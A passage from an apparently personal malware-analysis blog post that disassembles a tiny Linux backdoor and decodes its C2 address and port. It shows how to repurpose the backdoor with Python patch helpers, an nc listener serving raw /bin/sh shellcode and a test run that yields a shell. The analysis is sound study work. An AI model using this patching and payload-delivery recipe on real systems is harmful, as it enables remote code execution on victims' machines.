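<p>For comparison, here is a minimal sketch of the same call made through Python’s standard <code class="language-plaintext highlighter-rouge">socket</code> module. The helper name <code class="language-plaintext highlighter-rouge">open_stream_socket</code> is made up for the example; the three arguments mirror the values the assembly places in rdi, rsi and rdx.</p>

```python
import socket


def open_stream_socket():
    """Rough equivalent of socket(AF_INET, SOCK_STREAM, 0): a TCP/IPv4 endpoint."""
    return socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)


if __name__ == "__main__":
    with open_stream_socket() as s:
        # Numeric domain, type and protocol of the freshly created socket.
        print(int(s.family), int(s.type), s.proto)
```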

<p>This one is pretty self-explanatory, now let’s dig into the next chunk:</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="code"><pre><span class="err">0</span><span class="nf">x004000a6</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000a9</span>      <span class="nv">js</span> <span class="mh">0x4000e6</span>        <span class="c1">; jump forward to exit block if socket unsuccessful</span>
<span class="err">0</span><span class="nf">x004000ab</span>      <span class="nv">xchg</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000ad</span>      <span class="nv">movabs</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mh">0xc2edf86839050002</span> <span class="c1">; gets here if socket successful or connect unsuccessful and after nanosleep</span>
<span class="err">0</span><span class="nf">x004000b7</span>      <span class="nv">push</span> <span class="nb">rcx</span>           <span class="c1">; holds the connect addr structure</span>
<span class="err">0</span><span class="nf">x004000b8</span>      <span class="nv">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsp</span>       <span class="c1">; pointer to the addr structure</span>
<span class="err">0</span><span class="nf">x004000bb</span>      <span class="nv">push</span> <span class="mh">0x10</span>          <span class="c1">; 16</span>
<span class="err">0</span><span class="nf">x004000bd</span>      <span class="nv">pop</span> <span class="nb">rdx</span>
<span class="err">0</span><span class="nf">x004000be</span>      <span class="nv">push</span> <span class="mh">0x2a</span>          <span class="c1">; 42</span>
<span class="err">0</span><span class="nf">x004000c0</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000c1</span>      <span class="nv">syscall</span>            <span class="c1">; connect syscall</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>The code sets up syscall 42, connect, which is declared as <code class="language-plaintext highlighter-rouge">int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);</code>. The socket file descriptor returned in RAX is moved into RDI, RDX holds the address length (16), and the struct sockaddr is loaded into the RCX register, pushed on the stack and pointed to by RSI. Read byte by byte in memory order, the structure breaks down this way:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">02 00 AF_INET</code></li>
  <li><code class="language-plaintext highlighter-rouge">05 39 port 1337</code></li>
  <li><code class="language-plaintext highlighter-rouge">68 f8 ed c2 IP 104.248.237.194</code></li>
</ul>

<p>These are the IP address and port of the malware C2 to which the backdoor connects.</p>
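
<p>The breakdown above can be double-checked with a few lines of Python. This is a small sketch, and <code class="language-plaintext highlighter-rouge">decode_sockaddr_in</code> is a hypothetical helper name: it lays the 64-bit immediate out in little-endian memory order, then reads the family in host (little-endian) order and the port in network (big-endian) order.</p>

```python
import ipaddress


def decode_sockaddr_in(imm64):
    """Split the 8-byte movabs immediate into (family, port, ip)."""
    raw = imm64.to_bytes(8, "little")            # bytes as they sit in memory
    family = int.from_bytes(raw[0:2], "little")  # sin_family, host byte order
    port = int.from_bytes(raw[2:4], "big")       # sin_port, network byte order
    ip = str(ipaddress.IPv4Address(raw[4:8]))    # sin_addr, network byte order
    return family, port, ip


if __name__ == "__main__":
    print(decode_sockaddr_in(0xC2EDF86839050002))
```

<p>For the immediate found in the backdoor this prints <code class="language-plaintext highlighter-rouge">(2, 1337, '104.248.237.194')</code>.</p>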

<p>Here is the next assembly snippet:</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="code"><pre><span class="err">0</span><span class="nf">x004000c3</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000c4</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000c7</span>      <span class="nv">jns</span> <span class="mh">0x4000ee</span>       <span class="c1">; jump to read and execute shellcode if connect successful</span>
<span class="err">0</span><span class="nf">x004000c9</span>      <span class="nv">dec</span> <span class="nv">r9</span>             <span class="c1">; decrement the retry counter (initially 10)</span>
<span class="err">0</span><span class="nf">x004000cc</span>      <span class="nv">je</span> <span class="mh">0x4000e6</span>        <span class="c1">; exit once the counter reaches 0, i.e. every connect attempt failed</span>
<span class="err">0</span><span class="nf">x004000ce</span>      <span class="nv">push</span> <span class="nb">rdi</span>           <span class="c1">; save the socket file descriptor</span>
<span class="err">0</span><span class="nf">x004000cf</span>      <span class="nv">push</span> <span class="mh">0x23</span>          <span class="c1">; 35</span>
<span class="err">0</span><span class="nf">x004000d1</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000d2</span>      <span class="nv">push</span> <span class="mi">0</span>             <span class="c1">; timespec.tv_nsec = 0</span>
<span class="err">0</span><span class="nf">x004000d4</span>      <span class="nv">push</span> <span class="mi">5</span>             <span class="c1">; timespec.tv_sec = 5</span>
<span class="err">0</span><span class="nf">x004000d6</span>      <span class="nv">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span>       <span class="c1">; req = pointer to the timespec on the stack</span>
<span class="err">0</span><span class="nf">x004000d9</span>      <span class="nv">xor</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span>       <span class="c1">; rem = NULL</span>
<span class="err">0</span><span class="nf">x004000dc</span>      <span class="nv">syscall</span>            <span class="c1">; nanosleep syscall</span>
</pre></td></tr></tbody></table></code></pre></figure>

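<p>Syscall number 35 is nanosleep, declared as <code class="language-plaintext highlighter-rouge">int nanosleep(const struct timespec *req, struct timespec *rem);</code>. Here req points to a timespec of 5 seconds and 0 nanoseconds built on the stack and rem is NULL, so the backdoor pauses for 5 seconds before retrying. As per the man page, nanosleep does the following:</p>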

<blockquote>
  <p>nanosleep() suspends the execution of the calling thread until either
at least the time specified in *req has elapsed, or the delivery of a
signal that triggers the invocation of a handler in the calling
thread or that terminates the process. […] On successfully sleeping for the requested interval, nanosleep()
returns 0.  If the call is interrupted by a signal handler or
encounters an error, then it returns -1, with errno set to indicate
the error.</p>
</blockquote>
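
<p>Together with the counter kept in r9, this sleep forms a simple retry loop: up to 10 connect attempts with a 5 second pause between them. The control flow can be sketched in Python as below. This is an illustration of the logic only, not a translation of the binary: <code class="language-plaintext highlighter-rouge">connect_with_retries</code> and its <code class="language-plaintext highlighter-rouge">try_connect</code> callback are names invented for the example.</p>

```python
import time


def connect_with_retries(try_connect, attempts=10, delay=5.0, sleep=time.sleep):
    """Call try_connect() until it succeeds or the attempt counter hits zero.

    try_connect is any callable that returns a connection object or raises
    OSError. Returns the connection, or None when every attempt failed.
    """
    remaining = attempts              # plays the role of r9
    while True:
        try:
            return try_connect()      # success: go on to the read stage
        except OSError:
            remaining -= 1            # dec r9
            if remaining == 0:        # je exit
                return None
            sleep(delay)              # nanosleep for 5 seconds, then retry


if __name__ == "__main__":
    calls = []

    def always_refused():
        calls.append(1)
        raise ConnectionRefusedError("no listener")

    # A no-op sleep keeps the demonstration instantaneous.
    result = connect_with_retries(always_refused, sleep=lambda seconds: None)
    print(result, len(calls))
```

<p>Passing the sleep function as a parameter is only a convenience that lets the loop be exercised without actually waiting.</p>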

<p>We are approaching the end of the backdoor and the magic is going to kick in. Here is the final assembly snippet:</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td><td class="code"><pre><span class="err">0</span><span class="nf">x004000de</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000df</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000e0</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000e1</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000e4</span>      <span class="nv">jns</span> <span class="mh">0x4000ad</span>       <span class="c1">; jump back and retry connect if nanosleep succeeded; fall through to exit on error</span>
<span class="err">0</span><span class="nf">x004000e6</span>      <span class="nv">push</span> <span class="mh">0x3c</span>          <span class="c1">; gets here if socket unsuccessful or tried connecting 10 times or read failed or mmap failed</span>
<span class="err">0</span><span class="nf">x004000e8</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000e9</span>      <span class="nv">push</span> <span class="mi">1</span>             <span class="c1">; exit status 1</span>
<span class="err">0</span><span class="nf">x004000eb</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000ec</span>      <span class="nv">syscall</span>            <span class="c1">; exit syscall</span>
<span class="err">0</span><span class="nf">x004000ee</span>      <span class="nv">pop</span> <span class="nb">rsi</span>            <span class="c1">; gets here if connect successful, so RAX=0 (the read syscall number); rsi=mmapped address popped from the stack</span>
<span class="err">0</span><span class="nf">x004000ef</span>      <span class="nv">pop</span> <span class="nb">rdx</span>            <span class="c1">; rdx=4096, the maximum number of bytes to read from the socket</span>
<span class="err">0</span><span class="nf">x004000f0</span>      <span class="nv">syscall</span>            <span class="c1">; read syscall; rdi=connected socket file descriptor</span>
<span class="err">0</span><span class="nf">x004000f2</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000f5</span>      <span class="nv">js</span> <span class="mh">0x4000e6</span>        <span class="c1">; exit if read failed</span>
<span class="err">0</span><span class="nf">x004000f7</span>      <span class="nv">jmp</span> <span class="nb">rsi</span>            <span class="c1">; execute the bytes read from the connect syscall (shellcode) in the memory mapped address space</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>This code block contains the exit syscall, which is hit whenever one of the other syscalls (mmap, socket, connect, read) fails. Right after it, the read syscall uses the memory mapped address saved on the stack as a buffer and does exactly what it says: it reads up to 4096 bytes from the connected socket file descriptor and places them in the buffer. If no error arises, execution is passed to the opcodes starting at the address held in the RSI register, that is the memory mapped region (marked as RWX) that now holds the shellcode received over the connection. In other words, this tiny 249-byte backdoor achieves in-memory execution of arbitrary, remotely downloaded shellcode. There are no opsec features such as a decoding/decryption routine for the downloaded shellcode or a custom ELF packer scheme, so the C2 software for the backdoor can be anything capable of transmitting predetermined shellcode over a network socket, and anyone with a hex editor can change the sockaddr structure to modify the C2 IP and reuse the backdoor.</p>

<p>Let’s try that and modify the contents of the connect addr structure, i.e. the 8-byte immediate loaded by the instruction at address 0x004000ad.
Address 127.0.0.1 with port 1337 translates to <code class="language-plaintext highlighter-rouge">0x0100007f39050002</code>, so it is enough to patch the backdoor with any hex editor, such as bless.</p>
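
<p>The translation of an IP and port into that 64-bit value, and the patch itself, can also be scripted. Below is a hedged sketch: <code class="language-plaintext highlighter-rouge">encode_sockaddr_in</code> and <code class="language-plaintext highlighter-rouge">patch_c2</code> are hypothetical helper names, and the patch is demonstrated on a stand-alone copy of the 10-byte <code class="language-plaintext highlighter-rouge">movabs rcx, imm64</code> instruction (opcode bytes <code class="language-plaintext highlighter-rouge">48 b9</code>) rather than on the real file.</p>

```python
import ipaddress

AF_INET = 2


def encode_sockaddr_in(ip, port):
    """Build the 64-bit immediate holding family, port and IPv4 address."""
    raw = (
        AF_INET.to_bytes(2, "little")        # sin_family, host byte order
        + port.to_bytes(2, "big")            # sin_port, network byte order
        + ipaddress.IPv4Address(ip).packed   # sin_addr, network byte order
    )
    return int.from_bytes(raw, "little")


def patch_c2(blob, old_imm, new_imm):
    """Replace the single occurrence of old_imm (as 8 LE bytes) with new_imm."""
    old = old_imm.to_bytes(8, "little")
    new = new_imm.to_bytes(8, "little")
    if blob.count(old) != 1:
        raise ValueError("expected exactly one occurrence of the old sockaddr")
    return blob.replace(old, new)


if __name__ == "__main__":
    new_imm = encode_sockaddr_in("127.0.0.1", 1337)
    print(f"{new_imm:#018x}")
    # Stand-in for the instruction bytes found at 0x004000ad in the backdoor.
    insn = bytes.fromhex("48b9") + (0xC2EDF86839050002).to_bytes(8, "little")
    print(patch_c2(insn, 0xC2EDF86839050002, new_imm).hex())
```

<p>Refusing to patch unless the old value occurs exactly once is a deliberate safety check, so that an unrelated byte sequence is not overwritten by accident.</p>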

<p>We are using a <a href="http://shell-storm.org/shellcode/files/shellcode-806.php">/bin/sh shellcode</a> for a local test:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
</pre></td><td class="code"><pre>python <span class="nt">-c</span> "print '<span class="se">\x</span>31<span class="se">\x</span>c0<span class="se">\x</span>48<span class="se">\x</span>bb<span class="se">\x</span>d1<span class="se">\x</span>9d<span class="se">\x</span>96<span class="se">\x</span>91<span class="se">\x</span>d0<span class="se">\x</span>8c<span class="se">\x</span>97<span class="se">\x</span>ff<span class="se">\x</span>48<span class="se">\x</span>f7<span class="se">\x</span>db<span class="se">\x</span>53<span class="se">\x</span>54<span class="se">\x</span>5f<span class="se">\x</span>99<span class="se">\x</span>52<span class="se">\x</span>57<span class="se">\x</span>54<span class="se">\x</span>5e<span class="se">\x</span>b0<span class="se">\x</span>3b<span class="se">\x</span>0f<span class="se">\x</span>05'" | nc <span class="nt">-lvp</span> 1337
Listening on <span class="o">[</span>0.0.0.0] <span class="o">(</span>family 0, port 1337<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></figure>
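
<p>The one-liner above relies on the Python 2 <code class="language-plaintext highlighter-rouge">print</code> statement; under Python 3, <code class="language-plaintext highlighter-rouge">print</code> would encode the string as text and alter every byte above 0x7f. As an alternative, the listener side can be sketched with the standard <code class="language-plaintext highlighter-rouge">socket</code> module. The <code class="language-plaintext highlighter-rouge">serve_once</code> function and its <code class="language-plaintext highlighter-rouge">ready</code> callback are assumptions made for this example; the payload is whatever raw bytes should be handed to the first client.</p>

```python
import socket


def serve_once(payload, host="127.0.0.1", port=1337, ready=None):
    """Accept a single TCP client, send it the raw payload bytes, then close."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        if ready is not None:
            # Report the bound port, useful when port=0 lets the OS choose one.
            ready(srv.getsockname()[1])
        conn, _peer = srv.accept()
        with conn:
            conn.sendall(payload)


if __name__ == "__main__":
    # Placeholder bytes; substitute the payload used for the local test.
    serve_once(b"\x90\x90\x90\x90")
```

<p>Unlike the <code class="language-plaintext highlighter-rouge">print</code> based one-liner, this sends the bytes exactly as given, without a trailing newline.</p>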

<p>Finally, we fire up the patched backdoor:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="code"><pre>root@remnux:/home/remnux/Desktop/backdoor# ./pay_patched.bin
<span class="c"># echo $0</span>
/bin/sh
</pre></td></tr></tbody></table></code></pre></figure>

<p>That’s it: a repurposed backdoor.
Writing this post allowed me to better understand both the logic flow of the backdoor that the malware author(s) chose to use and Linux in-memory shellcode execution.</p>]]></content><author><name>Naksyn</name></author><category term="Backdoor" /><category term="reverse-engineering" /><category term="backdoor" /><category term="assembler" /><summary type="html"><![CDATA[]]></summary></entry></feed>